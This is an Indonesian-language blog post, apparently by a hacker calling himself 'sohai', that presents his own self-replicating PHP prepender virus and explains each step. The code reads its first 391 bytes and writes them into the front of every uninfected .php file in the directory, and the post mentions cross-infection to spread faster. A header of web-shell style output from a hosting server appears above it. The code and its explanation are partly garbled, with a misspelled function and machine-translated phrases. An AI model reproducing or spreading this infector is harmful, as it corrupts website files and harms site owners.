Uname
User
Php
Hdd
Chating
:Linux p3nlhg416.shr.prod.phx3.secureserver.net 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64
:666 ( sohai_666 ) Group: 666 ( ? )
:5.2.17 Safe mode: ON [ phpinfo ] Datetime: 2012-09-08 01:17:15
:10000.00 GB Free: 2802.46 GB (28%) GB
:sohai


PHP to infection file

aku mu kasih ilustrasi virus berbasis php.
virus yang PERTAMAX mengunakan 391 byte,viri ini seperti virus Prepender PHP.
Ex:situs perusahaan pada 13 byte dalam bentuk file yang di infeksi
code:



dimana jika fungsi SPTH maka file itu akan terinfeksi.

nie contoh file virus PHP dari aku:

code:





$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, 13), 'SPTH'))
{
rewind($victim);
fwrite($victim, $string.fread($victim, filessize($file)););
}
fclose($victim);
}
}
closedir($curdir);
?>






penjelasan:
.membaca 391 bytes PERTAMA (percis ukuran virus)


.situs perusahaan untuk setiap.PHP file dalam direktori saat ini

$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))

.jika tidak terinfeksi,membaca korban

{
$victim=fopen($file, 'r+');

.membuka file yg terinfeksi dan menyimpan file virus(
mencari SPTH dan menyalin seluruh file)

if (!strstr(fread($victim, 13), 'SPTH'))
{

.cek bila tidak terinfeksi(jika situs perusahaan tidak memliki tanda SPTH di mana saja file berada.jika tidak di temukan tidak di infeksi
dan membuat salinan file virus ke file

rewind($victim);
fwrite($victim, $string.fread($victim, filessize($file)););

.Cross infeksi
Cross = menginfeksi lebih dari satu file extensi nya.sehinga
virus dapat menyebar lebih cepat.
}
fclose($victim);
}
}
closedir($curdir);
?>

---------------------------------------------------------------------
NB:
Anda tidak bisa mengeksekusi file php secara langsung,tetapi dengan bantuan internet Browser
---------------------------------------------------------------------
sory kalovirus ku tidak bisa di execute langsung
0 komentar: di postingan PHP to infection file
 

0 komentar:

Posting Komentar

Source by sohai @2008